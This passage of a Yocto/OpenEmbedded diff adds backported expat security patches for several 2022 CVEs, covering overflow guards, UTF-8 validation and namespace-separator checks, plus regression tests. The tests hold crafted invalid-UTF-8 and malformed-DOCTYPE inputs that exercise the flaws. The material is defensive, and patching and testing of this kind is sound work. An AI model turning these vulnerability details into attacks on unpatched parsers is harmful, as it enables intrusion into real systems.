++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++# if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++# endif
++
+ temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
+ parser->m_attsSize * sizeof(XML_AttrInfo));
+ if (temp2 == NULL) {
+@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ tagNamePtr->prefixLen = prefixLen;
+ for (i = 0; localPart[i++];)
+ ; /* i includes null terminator */
++
++ /* Detect and prevent integer overflow */
++ if (binding->uriLen > INT_MAX - prefixLen
++ || i > INT_MAX - (binding->uriLen + prefixLen)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ n = i + binding->uriLen + prefixLen;
+ if (n > binding->uriAlloc) {
+ TAG *p;
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
+ if (! uri)
+ return XML_ERROR_NO_MEMORY;
+@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (parser->m_freeBindingList) {
+ b = parser->m_freeBindingList;
+ if (len > b->uriAlloc) {
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ XML_Char *temp = (XML_Char *)REALLOC(
+ parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (temp == NULL)
+@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ b = (BINDING *)MALLOC(parser, sizeof(BINDING));
+ if (! b)
+ return XML_ERROR_NO_MEMORY;
++
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ b->uri
+ = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (! b->uri) {
+@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
+ }
+ } else {
+ DEFAULT_ATTRIBUTE *temp;
++
++ /* Detect and prevent integer overflow */
++ if (type->allocDefaultAtts > INT_MAX / 2) {
++ return 0;
++ }
++
+ int count = type->allocDefaultAtts * 2;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
++ return 0;
++ }
++#endif
++
+ temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
+ (count * sizeof(DEFAULT_ATTRIBUTE)));
+ if (temp == NULL)
+@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
+ /* check for overflow (table is half full) */
+ if (table->used >> (table->power - 1)) {
+ unsigned char newPower = table->power + 1;
++
++ /* Detect and prevent invalid shift */
++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
++ return NULL;
++ }
++
+ size_t newSize = (size_t)1 << newPower;
+ unsigned long newMask = (unsigned long)newSize - 1;
++
++ /* Detect and prevent integer overflow */
++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
++ return NULL;
++ }
++
+ size_t tsize = newSize * sizeof(NAMED *);
+ NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
+ if (! newV)
+@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
+ if (dtd->scaffCount >= dtd->scaffSize) {
+ CONTENT_SCAFFOLD *temp;
+ if (dtd->scaffold) {
++ /* Detect and prevent integer overflow */
++ if (dtd->scaffSize > UINT_MAX / 2u) {
++ return -1;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
++ return -1;
++ }
++#endif
++
+ temp = (CONTENT_SCAFFOLD *)REALLOC(
+ parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
+ if (temp == NULL)
+@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
+ XML_Content *ret;
+ XML_Content *cpos;
+ XML_Char *str;
+- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
+- + (dtd->contentStringLen * sizeof(XML_Char)));
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
++ return NULL;
++ }
++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
++ return NULL;
++ }
++#endif
++ if (dtd->scaffCount * sizeof(XML_Content)
++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
++ return NULL;
++ }
++
++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
++ + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ ret = (XML_Content *)MALLOC(parser, allocsize);
+ if (! ret)
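Every hunk in this patch repeats one of two idioms: an additive guard (`a > INT_MAX - b` before computing `a + b`) and a multiplicative guard (`n > SIZE_MAX / sizeof(T)` before `n * sizeof(T)`), the latter wrapped in `#if UINT_MAX >= SIZE_MAX` so that -Wtype-limits stays quiet on targets where the comparison can never be true. A small sketch of the multiplicative form, with a hypothetical element type:

```
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>

typedef struct { int a; double b; } item_t;   /* hypothetical element type */

/* Allocate count items, rejecting a count * sizeof(item_t) overflow.
 * On 64-bit targets where unsigned int is narrower than size_t the
 * comparison below is always false, which is exactly why the patch
 * wraps it in "#if UINT_MAX >= SIZE_MAX". */
static item_t *alloc_items(unsigned int count) {
#if UINT_MAX >= SIZE_MAX
    if (count > (size_t)(-1) / sizeof(item_t))
        return NULL;
#endif
    return (item_t *)malloc((size_t)count * sizeof(item_t));
}
```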
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23852.patch b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
new file mode 100644
index 0000000000..41425c108b
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
+From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 22 Jan 2022 17:48:00 +0100
+Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
+ (CVE-2022-23852)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
+
+CVE: CVE-2022-23852
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d54af683..5ce31402 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
+ keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
+ if (keep > XML_CONTEXT_BYTES)
+ keep = XML_CONTEXT_BYTES;
++ /* Detect and prevent integer overflow */
++ if (keep > INT_MAX - neededSize) {
++ parser->m_errorCode = XML_ERROR_NO_MEMORY;
++ return NULL;
++ }
+ neededSize += keep;
+ #endif /* defined XML_CONTEXT_BYTES */
+ if (neededSize
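For context, XML_GetBuffer is half of Expat's pull-style input API: the application asks the parser for a buffer, copies raw bytes into it, then hands the byte count back via XML_ParseBuffer. A minimal usage sketch of that loop (chunk size and error handling chosen arbitrarily here):

```
#include <expat.h>
#include <stdio.h>

/* Feed a FILE* to an Expat parser via XML_GetBuffer/XML_ParseBuffer,
 * the API whose overflow guard the patch above hardens. */
static int parse_stream(XML_Parser p, FILE *fp) {
    for (;;) {
        void *buf = XML_GetBuffer(p, 4096);   /* may return NULL on OOM */
        if (buf == NULL)
            return 0;
        size_t n = fread(buf, 1, 4096, fp);
        if (XML_ParseBuffer(p, (int)n, n == 0) != XML_STATUS_OK)
            return 0;
        if (n == 0)                           /* EOF: final chunk was sent */
            return 1;
    }
}
```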
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23990.patch b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
new file mode 100644
index 0000000000..c599517b3e
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
+From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 26 Jan 2022 02:36:43 +0100
+Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
+
+The change from "int nameLen" to "size_t nameLen"
+addresses the overflow on "nameLen++" in code
+"for (; name[nameLen++];)" right above the second
+change in the patch.
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
+
+CVE: CVE-2022-23990
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ lib/xmlparse.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 5ce31402..d1d17005 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (dtd->in_eldecl) {
+ ELEMENT_TYPE *el;
+ const XML_Char *name;
+- int nameLen;
++ size_t nameLen;
+ const char *nxt
+ = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
+ int myindex = nextScaffoldPart(parser);
+@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ nameLen = 0;
+ for (; name[nameLen++];)
+ ;
+- dtd->contentStringLen += nameLen;
++
++ /* Detect and prevent integer overflow */
++ if (nameLen > UINT_MAX - dtd->contentStringLen) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ dtd->contentStringLen += (unsigned)nameLen;
+ if (parser->m_elementDeclHandler)
+ handleDefault = XML_FALSE;
+ }
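The commit message points out that the counter itself can overflow before the addition does: with `int nameLen`, a sufficiently long name makes `nameLen++` overflow a signed type, which is undefined behaviour. A small standalone sketch of the corrected pattern, using hypothetical names:

```
#include <limits.h>
#include <stddef.h>

/* Count the characters of a nul-terminated name, including the
 * terminator, and add the count to an unsigned running total without
 * wrapping. Returns 0 on overflow, 1 on success. */
static int add_name_length(const char *name, unsigned int *total) {
    size_t len = 0;
    for (; name[len++];)   /* same loop shape as doProlog; a size_t
                              counter cannot signed-overflow */
        ;
    if (len > UINT_MAX - *total)
        return 0;          /* mirrors the new guard in the patch */
    *total += (unsigned int)len;
    return 1;
}
```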
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
+From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 17:37:14 +0100
+Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/562/commits
+
+CVE: CVE-2022-25235
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmltok.c | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/lib/xmltok.c b/lib/xmltok.c
+index a72200e8..3bddf125 100644
+--- a/lib/xmltok.c
++++ b/lib/xmltok.c
+@@ -95,11 +95,6 @@
+ + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)] \
+ & (1u << (((byte)[2]) & 0x1F)))
+
+-#define UTF8_GET_NAMING(pages, p, n) \
+- ((n) == 2 \
+- ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p)) \
+- : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
+-
+ /* Detection of invalid UTF-8 sequences is based on Table 3.1B
+ of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
+ with the additional restriction of not allowing the Unicode
+From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:32:20 +0100
+Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/lib/xmltok_impl.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 0430591b4..64a3b2c15 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -61,7 +61,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NAME_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -90,7 +90,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
++ if (IS_INVALID_CHAR(enc, ptr, n)) { \
++ *nextTokPtr = ptr; \
++ return XML_TOK_INVALID; \
++ } \
+ if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ ptr += n; \
+ tok = XML_TOK_NAME; \
+From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 9 Feb 2022 01:00:38 +0100
+Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
+ already been validated
+
+---
+ expat/lib/xmltok_impl.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 64a3b2c1..84ff35f9 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
+ state = inName; \
+ }
+ # define LEAD_CASE(n) \
+- case BT_LEAD##n: \
++ case BT_LEAD##n: /* NOTE: The encoding has already been validated. */ \
+ START_NAME ptr += (n - MINBPC(enc)); \
+ break;
+ LEAD_CASE(2)
+@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:06:21 +0100
+Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 109 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index bc5344b1..9b155b82 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
+ }
+ END_TEST
+
++START_TEST(test_utf8_in_start_tags) {
++ struct test_case {
++ bool goodName;
++ bool goodNameStart;
++ const char *tagName;
++ };
++
++ // The idea with the tests below is this:
++ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
++ // go to isNever and are hence not a concern.
++ //
++ // We start with a character that is a valid name character
++ // (or even name-start character, see XML 1.0r4 spec) and then we flip
++ // single bits at places where (1) the result leaves the UTF-8 encoding space
++ // and (2) we stay in the same n-byte sequence family.
++ //
++ // The flipped bits are highlighted in angle brackets in comments,
++ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
++ // the most significant bit to 1 to leave UTF-8 encoding space.
++ struct test_case cases[] = {
++ // 1-byte UTF-8: [0xxx xxxx]
++ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
++ {false, false, "\xBA"}, // [<1>011 1010]
++ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
++ {false, false, "\xB9"}, // [<1>011 1001]
++
++ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
++ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
++ // Arabic small waw U+06E5
++ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
++ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
++ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
++ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
++ // combining char U+0301
++ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
++ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
++ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
++
++ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
++ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
++ // Devanagari Letter A U+0905
++ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
++ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
++ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
++ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
++ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
++ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
++ // combining char U+0901
++ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
++ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
++ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
++ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
++ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
++ };
++ const bool atNameStart[] = {true, false};
++
++ size_t i = 0;
++ char doc[1024];
++ size_t failCount = 0;
++
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ size_t j = 0;
++ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
++ const bool expectedSuccess
++ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
++ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
++ XML_Parser parser = XML_ParserCreate(NULL);
++
++ const enum XML_Status status
++ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
++
++ bool success = true;
++ if ((status == XML_STATUS_OK) != expectedSuccess) {
++ success = false;
++ }
++ if ((status == XML_STATUS_ERROR)
++ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
++ success = false;
++ }
++
++ if (! success) {
++ fprintf(
++ stderr,
++ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
++ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
++ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
++ failCount++;
++ }
++
++ XML_ParserFree(parser);
++ }
++ }
++
++ if (failCount > 0) {
++ fail("UTF-8 regression detected");
++ }
++}
++END_TEST
++
+ /* Test trailing spaces in elements are accepted */
+ static void XMLCALL
+ record_element_end_handler(void *userData, const XML_Char *name) {
+@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
+ }
+ END_TEST
+
++START_TEST(test_bad_doctype_utf8) {
++ const char *text = "<!DOCTYPE \xDB\x25"
++ "doc><doc/>"; // [1101 1011] [<0>010 0101]
++ expect_failure(text, XML_ERROR_INVALID_TOKEN,
++ "Invalid UTF-8 in DOCTYPE not faulted");
++}
++END_TEST
++
+ START_TEST(test_bad_doctype_utf16) {
+ const char text[] =
+ /* <!DOCTYPE doc [ \x06f2 ]><doc/>
+@@ -11870,6 +11977,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
++ tcase_add_test(tc_basic, test_utf8_in_start_tags);
+ tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
+ tcase_add_test(tc_basic, test_utf16_attribute);
+ tcase_add_test(tc_basic, test_utf16_second_attr);
+@@ -11878,6 +11986,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype);
++ tcase_add_test(tc_basic, test_bad_doctype_utf8);
+ tcase_add_test(tc_basic, test_bad_doctype_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype_plus);
+ tcase_add_test(tc_basic, test_bad_doctype_star);
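The bit-flipping tables in the new test probe one property: a multi-byte UTF-8 sequence is well formed only if the lead byte and each continuation byte keep their expected bit patterns. A rough standalone check for 2-byte sequences, shown only to make the encodings in the comments above concrete (it is not the macro machinery the patch modifies):

```
#include <stdbool.h>

/* Rough validity check for a 2-byte UTF-8 sequence.
 * The lead byte must look like 110xxxxx, the continuation like 10xxxxxx,
 * and leads 0xC0/0xC1 are rejected as overlong encodings of U+0000..U+007F. */
static bool is_valid_utf8_2(unsigned char b0, unsigned char b1) {
    if ((b0 & 0xE0u) != 0xC0u)    /* not a 2-byte lead */
        return false;
    if (b0 < 0xC2u)               /* overlong encoding */
        return false;
    return (b1 & 0xC0u) == 0x80u; /* continuation byte */
}
```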
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
+From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:19:13 +0100
+Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/561/commits
+
+CVE: CVE-2022-25236
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 902895d5..c768f856 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
+
+ XML_Parser XMLCALL
+ XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
+- XML_Char tmp[2];
+- *tmp = nsSep;
++ XML_Char tmp[2] = {nsSep, 0};
+ return XML_ParserCreate_MM(encodingName, NULL, tmp);
+ }
+
+@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
+ would be otherwise.
+ */
+ if (parser->m_ns) {
+- XML_Char tmp[2];
+- *tmp = parser->m_namespaceSeparator;
++ XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
+ parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
+ } else {
+ parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
+From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 01:09:29 +0100
+Subject: [PATCH] lib: Protect against malicious namespace declarations
+ (CVE-2022-25236)
+
+---
+ expat/lib/xmlparse.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c768f856..a3aef88c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (! mustBeXML && isXMLNS
+ && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
+ isXMLNS = XML_FALSE;
++
++ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
++ // we have to at least make sure that the XML processor on top of
++ // Expat (that is splitting tag names by namespace separator into
++ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
++ // by an attacker putting additional namespace separator characters
++ // into namespace declarations. That would be ambiguous and not to
++ // be expected.
++ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
++ return XML_ERROR_SYNTAX;
++ }
+ }
+ isXML = isXML && len == xmlLen;
+ isXMLNS = isXMLNS && len == xmlnsLen;
+From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:51:43 +0100
+Subject: [PATCH] tests: Cover CVE-2022-25236
+
+---
+ expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
+ 1 file changed, 30 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index d07203f2..bc5344b1 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
+ }
+ END_TEST
+
